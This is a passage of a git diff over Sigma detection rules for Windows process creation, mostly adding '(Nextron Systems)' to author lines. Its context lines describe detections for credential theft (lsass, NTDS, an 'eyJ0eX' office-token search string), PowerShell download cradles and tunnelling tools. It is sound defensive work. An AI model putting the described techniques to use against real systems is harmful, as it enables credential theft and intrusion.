suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks references: - https://twitter.com/ORCA6665/status/1496478087244095491 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/23 modified: 2022/04/21 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml index 679e9fff9..5fe2612ea 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/bigmacjpg/status/1349727699863011328?s=12 - https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/ - http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt -author: Florian Roth, omkar72, oscd.community +author: Florian Roth (Nextron Systems), omkar72, oscd.community date: 2021/02/24 modified: 2022/08/16 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_format.yml b/rules/windows/process_creation/proc_creation_win_susp_format.yml index 9eb000f31..273884d23 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_format.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_format.yml @@ -5,7 +5,7 @@ description: Detects the execution of format.com with a suspicious filesystem se references: - https://twitter.com/0gtweet/status/1477925112561209344 - https://twitter.com/wdormann/status/1478011052130459653?s=20 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/04 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_git_clone.yml b/rules/windows/process_creation/proc_creation_win_susp_git_clone.yml index 3ecf4adfe..65f53c7fc 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_git_clone.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_git_clone.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious references: - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/03 modified: 2023/01/10 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml b/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml index 5ab145042..0bb89521f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml @@ -5,7 +5,7 @@ description: Detects creation of a scheduled task with a GUID like name references: - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/ - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/31 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup.yml b/rules/windows/process_creation/proc_creation_win_susp_gup.yml index 9bde95f1a..61ee08673 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_gup.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_gup.yml @@ -4,7 +4,7 @@ status: test description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks references: - https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/02/06 modified: 2022/08/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml b/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml index 1e4429250..5e45b0ac6 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. references: - https://twitter.com/nas_bench/status/1535322182863179776 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/10 tags: - attack.command_and_control diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml index c3dfb1d8b..36dca49c7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables references: - https://twitter.com/nas_bench/status/1535322445439180803 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/10 modified: 2022/09/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml b/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml index 9c57e1170..1a36b1f82 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml @@ -4,7 +4,7 @@ status: test description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors references: - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ -author: Florian Roth (rule), Microsoft (idea) +author: Florian Roth (Nextron Systems), Microsoft (idea) date: 2022/08/04 modified: 2023/01/23 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml index fa68132c9..2c7bd965b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml @@ -4,7 +4,7 @@ status: experimental description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ -author: Max Altgelt +author: Max Altgelt (Nextron Systems) date: 2021/12/09 modified: 2022/12/14 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml index 40517c79d..df1d7650b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml @@ -7,7 +7,7 @@ status: experimental description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/02 modified: 2022/09/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml b/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml index 9ad243c85..b3f9821b9 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml @@ -6,7 +6,7 @@ references: - https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/ - https://twitter.com/Hexacorn/status/1420053502554951689 - https://twitter.com/SBousseaden/status/1464566846594691073?s=20 -author: Florian Roth, Samir Bousseaden +author: Florian Roth (Nextron Systems), Samir Bousseaden date: 2021/11/27 modified: 2022/12/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_manageengine_pattern.yml b/rules/windows/process_creation/proc_creation_win_susp_manageengine_pattern.yml index f9e074546..da9dc0996 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_manageengine_pattern.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_manageengine_pattern.yml @@ -6,7 +6,7 @@ references: - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ - https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py - https://blog.viettelcybersecurity.com/saml-show-stopper/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2023/01/18 modified: 2023/01/21 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml b/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml index dd939d1c5..ba886f9b9 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml @@ -7,7 +7,7 @@ description: | references: - https://twitter.com/cyb3rops/status/1562072617552678912 - https://ss64.com/nt/cmd.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/23 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml index c468a83ee..b63b8bfda 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml @@ -9,7 +9,7 @@ references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml - https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/12 modified: 2022/09/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml b/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml index 58e79822e..17a60ad9c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml @@ -5,7 +5,7 @@ description: Detects a certain command line flag combination used by mpiexec.exe references: - https://twitter.com/mrd0x/status/1465058133303246867 - https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/11 modified: 2022/03/04 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml b/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml index e1b1d23e4..1977da4f9 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml @@ -6,7 +6,7 @@ references: - https://en.wikipedia.org/wiki/HTML_Application - https://www.echotrail.io/insights/search/mshta.exe - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/17 modified: 2022/11/07 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml b/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml index c173f7391..29dfaf6d1 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml @@ -7,7 +7,7 @@ status: experimental description: Detects suspicious command line using the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...) references: - https://twitter.com/n1nj4sec/status/1421190238081277959 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/14 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml b/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml index 9f44f3b67..089593502 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml @@ -4,7 +4,7 @@ status: test description: Detects execution of msiexec from an uncommon directory references: - https://twitter.com/200_okay_/status/1194765831911215104 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/11/14 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml b/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml index 682990032..9c6b54d10 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml @@ -7,7 +7,7 @@ status: test description: Detects suspicious msiexec process starts with web addresses as parameter references: - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/02/09 modified: 2022/01/07 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_net_use.yml b/rules/windows/process_creation/proc_creation_win_susp_net_use.yml index 85ceaa4ff..734806c6c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_net_use.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_net_use.yml @@ -5,7 +5,7 @@ description: Detects net use command combo which executes files from WebDAV serv references: - https://twitter.com/ShadowChasing1/status/1552595370961944576 - https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior -author: pH-T +author: pH-T (Nextron Systems) date: 2022/09/01 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml b/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml index 0af8e5e0b..a5cd14550 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of client32.exe (NetSupport RAT) from an unsual location (outisde of 'C:\Program Files') references: - https://redcanary.com/blog/misbehaving-rats/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml b/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml index 42edc3efa..71065e449 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml @@ -4,7 +4,7 @@ status: experimental description: Detects creation of a new service (kernel driver) with the type "kernel" references: - https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/14 modified: 2022/08/08 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml b/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml index 600468e2c..6c1c909bb 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml @@ -8,7 +8,7 @@ description: Detects creation of a new service via "sc" command or the powershel references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/14 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml b/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml index c6cbee48c..be4acb8e6 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml @@ -12,7 +12,7 @@ references: - https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/ - https://twitter.com/xorJosh/status/1598646907802451969 - https://www.softwaretestinghelp.com/how-to-use-ngrok/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/05/14 modified: 2022/12/02 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml index 2752e56b0..0e54a93fc 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml @@ -4,7 +4,7 @@ status: experimental description: Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process) references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ -author: Max Altgelt +author: Max Altgelt (Nextron Systems) date: 2021/12/09 modified: 2023/01/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml b/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml index e396281b9..8012176a4 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml @@ -4,7 +4,7 @@ status: test description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection references: - https://www.x86matthew.com/view_post?id=ntdll_pipe -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/05 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntds.yml b/rules/windows/process_creation/proc_creation_win_susp_ntds.yml index 5fba45831..8f7356f2c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntds.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ntds.yml @@ -10,7 +10,7 @@ references: - https://github.com/zcgonvh/NTDSDumpEx - https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1 - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/11 modified: 2022/11/10 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml index 6619facd3..9697758aa 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml @@ -8,7 +8,7 @@ description: Detects execution of ntdsutil.exe to perform different actions such references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11) - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/14 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml b/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml index 4713f9807..abb3095c1 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml @@ -5,7 +5,7 @@ description: Detects a privilege elevation attempt by coercing NTLM authenticati references: - https://twitter.com/med0x2e/status/1520402518685200384 - https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml -author: Elastic (idea), Tobias Michalski +author: Elastic (idea), Tobias Michalski (Nextron Systems) date: 2022/05/04 modified: 2022/12/02 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml b/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml index 17454b5c1..741384f66 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml @@ -4,7 +4,7 @@ status: experimental description: Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps. references: - https://mrd0x.com/stealing-tokens-from-office-applications/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/25 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml b/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml index 732245022..be17b11b8 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml @@ -2,7 +2,7 @@ title: Execution in Outlook Temp Folder id: a018fdc3-46a3-44e5-9afb-2cd4af1d4b39 status: test description: Detects a suspicious program execution in Outlook temp folder -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/10/01 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_parents.yml b/rules/windows/process_creation/proc_creation_win_susp_parents.yml index ad929aa3c..4591730e4 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_parents.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_parents.yml @@ -5,7 +5,7 @@ description: Detects suspicious parent processes that should not have any childr references: - https://twitter.com/x86matthew/status/1505476263464607744?s=12 - https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/21 modified: 2022/09/08 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml b/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml index a84539737..94b8b71d4 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml @@ -6,7 +6,7 @@ references: - http://www.xuetr.com/ - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/ - https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/ -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2022/10/10 modified: 2022/12/30 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml b/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml index 646fece0c..1a0e4d894 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml @@ -5,7 +5,7 @@ description: Detects a ping command that uses a hex encoded IP address references: - https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna - https://twitter.com/vysecurity/status/977198418354491392 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/03/23 modified: 2022/01/07 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml b/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml index 6c95412af..aeeface9d 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml @@ -5,7 +5,7 @@ description: Detects suspicious Plink tunnel port forwarding to a local port references: - https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/ - https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/01/19 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml index d0f426164..10827a725 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml @@ -7,7 +7,7 @@ status: test description: Execution of plink to perform data exfiltration and tunneling references: - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/04 modified: 2023/01/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_base64_encoded_cmd.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_base64_encoded_cmd.yml index 01e273662..2c5181df2 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_base64_encoded_cmd.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_base64_encoded_cmd.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) references: - https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e -author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community date: 2018/09/03 modified: 2021/03/02 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml index 6ec1ffd49..5e1824a34 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious ways to download files or content using PowerShell references: - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/24 modified: 2023/01/05 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml index 233b9fbe1..1ad9bade3 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression references: - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/24 modified: 2023/01/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml index f17f3798b..bde271965 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml @@ -7,7 +7,7 @@ references: - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191 - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178 - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/04/20 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_cmd_patterns.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_cmd_patterns.yml index ee0f6a3a2..1ffc21899 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_cmd_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_cmd_patterns.yml @@ -4,7 +4,7 @@ status: experimental description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains references: - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/05/24 modified: 2023/01/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml index 411a4258a..41d5e49fc 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml @@ -4,7 +4,7 @@ status: test description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity references: - https://twitter.com/PythonResponder/status/1385064506049630211 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/04/23 modified: 2023/01/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml index 10496ed6c..13e2d5b22 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious ways to run Invoke-Execution using IEX alias references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/24 modified: 2022/11/28 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_invocation_specific.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_invocation_specific.yml index 576b5a1c7..79cce4ba6 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_invocation_specific.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_invocation_specific.yml @@ -9,7 +9,7 @@ related: type: similar status: experimental description: 